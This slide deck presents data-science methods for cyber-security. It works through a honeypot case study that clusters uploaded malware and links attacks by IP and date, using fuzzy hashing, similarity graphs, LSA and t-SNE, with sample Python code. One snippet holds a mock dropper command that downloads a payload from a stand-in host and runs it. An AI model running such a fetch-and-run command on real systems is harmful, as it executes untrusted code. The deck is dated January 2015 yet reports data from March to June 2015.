Applications of Data Science in Cyber-Security

Richard Xie
https://linkedin.com/in/richardxy
January 2015

What is Cyber-Security?

• A.k.a.
  – computer security, network security

• Secure network assets from intrusions and data breaches

• Assets include:
  – servers, workstations, mobile devices

• Layers to secure:
  – firewalls, operating systems, files, credentials, etc.

Why Is It Important?

http://www.informationisbeautiful.net/visualizations/worlds-biggest-data-breaches-hacks/

Severe shortage of experts predicted

Cyber-Security + Data Science

Common Threats

• Exploitation of software vulnerabilities

• Fraud: spoofing, phishing, pharming

• Malicious code (worms, viruses, spyware, etc.)

• DDoS

How Would Data Science Help?

• Cyber-security is a big-data business
  – network logs
  – files
  – user-machine interactions
  – volume, velocity, variety, and veracity

• Data science is the engine that will power next-generation cyber-security solutions

Application Examples

• Spam email classification

• Malware classification

• Malicious IP classification

• Intrusion detection

• Network anomaly detection

• Hacker attribution

• and more...

A Real Case Study

• Hunting for Honeypot Attackers: A Data Scientist’s Adventure

• A honeynet is a set of honeypot systems deployed on the internet

• A honeypot logs all hacking activities

• A honeypot stores files uploaded by hackers

• The uploaded malware is the hackers' weapon

https://www.linkedin.com/pulse/hunting-honeypot-attackers-data-scientists-adventure-richard-xie?trk=pulse-det-nav_art

Raw Statistics

• Data collection period
  – from March 2015 through the end of June 2015

• >21k attacker IP addresses

• 36 million SSH attempts

• 34k unique usernames + 1 million passwords tried

• 500 malicious domains and >1000 unique malware samples identified

Geo-location of Attacks

map_hacker_IP.py

Time Series of Attacks

time_series_activity.py

What the Raw Data Look Like

Questions to Answer

• Clustering downloaded/crawled files to find file groups/categories

• Attribution
  – association between attacks from different days and IPs
  – where they came from

File Similarity Computation

• An MD5 hash can't reflect slight changes in a file (any change produces an unrelated digest)

• Fuzzy hashing does

• Using ssdeep, I computed pair-wise similarity for all collected binary files and tar files
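The contrast between an exact hash and a similarity score can be sketched with the standard library alone. This is not ssdeep: `difflib.SequenceMatcher` is swapped in as a stand-in that also yields a 0 to 100 score, and the two script bodies and the `example.invalid` URL are made up for illustration.

```python
import hashlib
from difflib import SequenceMatcher


def md5_hex(data: bytes) -> str:
    """Exact fingerprint: changes completely if a single byte changes."""
    return hashlib.md5(data).hexdigest()


def similarity_percent(a: bytes, b: bytes) -> int:
    """Stand-in for a fuzzy-hash comparison (NOT ssdeep): 0 to 100."""
    matcher = SequenceMatcher(None, a, b, autojunk=False)
    return round(100 * matcher.ratio())


# Hypothetical dropper script and a variant that differs in one byte.
original = b"#!/bin/sh\nwget http://example.invalid/payload\nchmod +x payload\n./payload\n" * 4
variant = original.replace(b"payload", b"payl0ad", 1)

print("same MD5:", md5_hex(original) == md5_hex(variant))
print("similarity:", similarity_percent(original, variant))
```

With the real tool, the Python `ssdeep` bindings expose `ssdeep.hash()` and `ssdeep.compare()`, which play the roles of hashing a file and scoring a pair of hashes.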

Steps to prepare data

• readRawData.py to create a collection "downloadsCollection"

• extract_crawled_file_to_mongo.py to create crawledFileCollection

• uniq_ip_count_MR.js to create uniqURLCollection

• uniq_ip_date_MR.js to create uniqURLDateCollection

• uniq_date_ip_MR.js to create uniqDateURLCollection

• uniq_hash_count_MR.js to create uniqFileCollection

• uniq_country_count_MR.js to create uniqCountryCollection
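The `*_MR.js` scripts are not shown in the slides, so the following is only a guess at the kind of aggregation they perform, written in plain Python rather than as MongoDB map-reduce jobs. The record fields (`date`, `ip`, `file_hash`, `country`) and all values are hypothetical.

```python
from collections import Counter, defaultdict

# Hypothetical download records; field names and values are assumptions.
downloads = [
    {"date": "2015-03-23", "ip": "192.0.2.10", "file_hash": "h1", "country": "AA"},
    {"date": "2015-03-23", "ip": "192.0.2.10", "file_hash": "h2", "country": "AA"},
    {"date": "2015-03-24", "ip": "192.0.2.10", "file_hash": "h1", "country": "AA"},
    {"date": "2015-03-24", "ip": "198.51.100.7", "file_hash": "h3", "country": "BB"},
]


def count_by(records, key):
    """Map: emit (record[key], 1). Reduce: sum the ones per key."""
    return Counter(record[key] for record in records)


def group_unique(records, key, value):
    """Map: emit (record[key], record[value]). Reduce: collect unique values."""
    grouped = defaultdict(set)
    for record in records:
        grouped[record[key]].add(record[value])
    return dict(grouped)


ip_counts = count_by(downloads, "ip")
hash_counts = count_by(downloads, "file_hash")
dates_per_ip = group_unique(downloads, "ip", "date")
ips_per_date = group_unique(downloads, "date", "ip")
print(ip_counts.most_common(1), dates_per_ip)
```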

Graph of Files

Two files are connected by an edge when their similarity exceeds a threshold (for example, 60%)

identifySimilarDownloads.py from line 166

./graphiti demo graph_data/weighted_files2.json
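A minimal sketch of the thresholding step, assuming pair-wise scores are already available as a dictionary. The file names and scores are invented, and the JSON layout expected by graphiti is not reproduced here; the sketch stops at the edge list and the resulting file groups.

```python
from collections import defaultdict


def build_edges(pair_scores, threshold=60):
    """Keep only file pairs whose similarity score exceeds the threshold."""
    return [(a, b, score) for (a, b), score in pair_scores.items() if score > threshold]


def connected_groups(edges):
    """Group files that are linked directly or through intermediate files."""
    neighbors = defaultdict(set)
    for a, b, _ in edges:
        neighbors[a].add(b)
        neighbors[b].add(a)

    seen, groups = set(), []
    for start in sorted(neighbors):
        if start in seen:
            continue
        stack, group = [start], set()
        while stack:  # depth-first walk over one connected component
            node = stack.pop()
            if node in seen:
                continue
            seen.add(node)
            group.add(node)
            stack.extend(neighbors[node] - seen)
        groups.append(sorted(group))
    return groups


# Hypothetical pair-wise similarity scores (0 to 100).
pair_scores = {
    ("bot_a", "bot_b"): 88,
    ("bot_b", "bot_c"): 72,
    ("bot_a", "scanner_x"): 12,
    ("scanner_x", "scanner_y"): 65,
    ("bot_c", "scanner_y"): 0,
}
edges = build_edges(pair_scores)
groups = connected_groups(edges)
print(groups)
```

Each group is a candidate file family: members need not all be similar to one another, only reachable through a chain of similar pairs.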

Files -> Hacker

• A hacker may use the same or similar tools on different days to hack systems

• The file similarity matrix may hint at who was using those files

• Treat date+IP as a unique attack, and all its associated binary files as its features

• Construct a term matrix for all attacks
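The term matrix can be sketched as follows: one row per attack (a date+IP key) and one column per file. The event tuples are hypothetical, and using binary presence rather than counts is an assumption; the slides do not say which was used.

```python
def build_term_matrix(events):
    """Return (attack_ids, file_ids, matrix); matrix[i][j] is 1 when
    attack i involved file j, otherwise 0."""
    attack_ids = sorted({f"{date}%%{ip}" for date, ip, _ in events})
    file_ids = sorted({file_id for _, _, file_id in events})
    row = {attack: i for i, attack in enumerate(attack_ids)}
    col = {file_id: j for j, file_id in enumerate(file_ids)}

    matrix = [[0] * len(file_ids) for _ in attack_ids]
    for date, ip, file_id in events:
        matrix[row[f"{date}%%{ip}"]][col[file_id]] = 1
    return attack_ids, file_ids, matrix


# Hypothetical (date, attacker IP, file identifier) observations.
events = [
    ("2015-03-23", "192.0.2.10", "file_a"),
    ("2015-03-23", "192.0.2.10", "file_b"),
    ("2015-03-24", "192.0.2.10", "file_a"),
    ("2015-03-24", "198.51.100.7", "file_c"),
]
attack_ids, file_ids, matrix = build_term_matrix(events)
for attack, features in zip(attack_ids, matrix):
    print(attack, features)
```

In document-term language, each attack plays the role of a document and each file the role of a term.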

t-SNE on Attack-Malware Matrix with K-Means Labeling

k=10

t-SNE: t-Distributed Stochastic Neighbor Embedding

get_similar_IPs.py from line 181

Latent Semantic Analysis

• LSA is widely used in NLP for topic finding

• Analyzes relationships between a set of documents and the terms they contain

• Uses SVD to reduce number of dimensions while maintaining record similarities

SVD: Singular Value Decomposition
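The dimension reduction can be illustrated with a small pure-Python sketch that approximates the two largest singular values by power iteration with deflation, then projects each row onto the corresponding right singular vectors. In practice a library routine such as `numpy.linalg.svd` would be used; the matrix below is made up, and the iteration count is an arbitrary choice.

```python
import math


def matvec(m, v):
    """Multiply matrix m (list of rows) by vector v."""
    return [sum(x * y for x, y in zip(row, v)) for row in m]


def top_singular_pairs(a, k=2, iterations=200):
    """Approximate the k largest singular values of a and their right
    singular vectors via power iteration on A^T A with deflation."""
    at = [list(col) for col in zip(*a)]
    found = []  # list of (sigma, right singular vector)
    for _ in range(k):
        v = [1.0 + j for j in range(len(at))]  # deterministic start vector
        for _ in range(iterations):
            for _, u in found:  # remove directions already extracted
                dot = sum(x * y for x, y in zip(v, u))
                v = [x - dot * y for x, y in zip(v, u)]
            w = matvec(at, matvec(a, v))
            norm = math.sqrt(sum(x * x for x in w))
            if norm == 0:
                break
            v = [x / norm for x in w]
        sigma = math.sqrt(sum(x * x for x in matvec(a, v)))
        found.append((sigma, v))
    return found


def project(a, pairs):
    """Coordinates of each row of a in the reduced space (A times V_k)."""
    return [[sum(x * y for x, y in zip(row, v)) for _, v in pairs] for row in a]


# Hypothetical attack-by-file matrix: rows 0 and 1 used the same files.
term_matrix = [
    [1, 1, 0, 0],
    [1, 1, 0, 0],
    [0, 0, 1, 1],
    [0, 0, 1, 0],
]
pairs = top_singular_pairs(term_matrix, k=2)
coords = project(term_matrix, pairs)
for row in coords:
    print([round(x, 3) for x in row])
```

Rows that share the same files land on the same point in the reduced space, which is the property the attribution step relies on.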

Attacks Expressed with 1st and 2nd Principal Components

Each vector is a date+IP incident (a row in the term matrix)

Compute Similarities among Attacks

• Attacks similar to a particular one: 2015-03-23%%61.160.212.21:5947 is similar to
  – 2015-03-23%%118.193.241.192, similarity 0.958453
  – 2015-03-23%%222.186.190.157:56789, similarity 0.996835
  – 2015-03-24%%222.186.190.157:56789, similarity 0.961000
  – 2015-03-25%%117.21.176.79:333, similarity 0.997087
  – 2015-03-25%%222.186.190.157:56789, similarity 0.946751
  – 2015-06-17%%222.186.30.175:56789, similarity 0.996835
  – 2015-06-17%%61.160.247.42:1988, similarity 0.996835
  – 2015-06-18%%222.186.30.175:56789, similarity 0.996835
  – 2015-06-18%%61.160.247.42:1988, similarity 0.996835
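A ranking like the one above can be sketched with cosine similarity between attack vectors. The slides do not name the similarity measure, so cosine is an assumption here, as are the reduced vectors, the attack keys, and the 0.9 cutoff.

```python
import math


def cosine(u, v):
    """Cosine of the angle between two vectors; 0.0 if either is all zeros."""
    dot = sum(x * y for x, y in zip(u, v))
    norm_u = math.sqrt(sum(x * x for x in u))
    norm_v = math.sqrt(sum(x * x for x in v))
    return dot / (norm_u * norm_v) if norm_u and norm_v else 0.0


def most_similar(target, vectors, min_similarity=0.9):
    """Return (attack_id, similarity) pairs at or above the cutoff, best first."""
    scores = [
        (other, cosine(vectors[target], vec))
        for other, vec in vectors.items()
        if other != target
    ]
    kept = [pair for pair in scores if pair[1] >= min_similarity]
    return sorted(kept, key=lambda pair: pair[1], reverse=True)


# Hypothetical 2-D attack vectors keyed by date%%IP.
vectors = {
    "2015-03-23%%192.0.2.10": [1.0, 0.1],
    "2015-03-24%%192.0.2.10": [0.9, 0.1],
    "2015-03-24%%198.51.100.7": [0.0, 1.0],
}
matches = most_similar("2015-03-23%%192.0.2.10", vectors)
for attack_id, score in matches:
    print(f"{attack_id}, similarity {score:.6f}")
```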

Time Series of Attack Counts for Group 1

Time Series of Attack Counts for Group 2

Visualization of Attack Graph

./graphiti demo graph_data/weighted_IPs_95percent.json

We know where they were from

python_map_IP_latlon.py

So what?

• The analysis may lead to
  – near-real-time attribution (is it a new attack, or something we saw before?)
  – near-real-time triage (is it new malware, or a variant of existing malware?)
  – more...
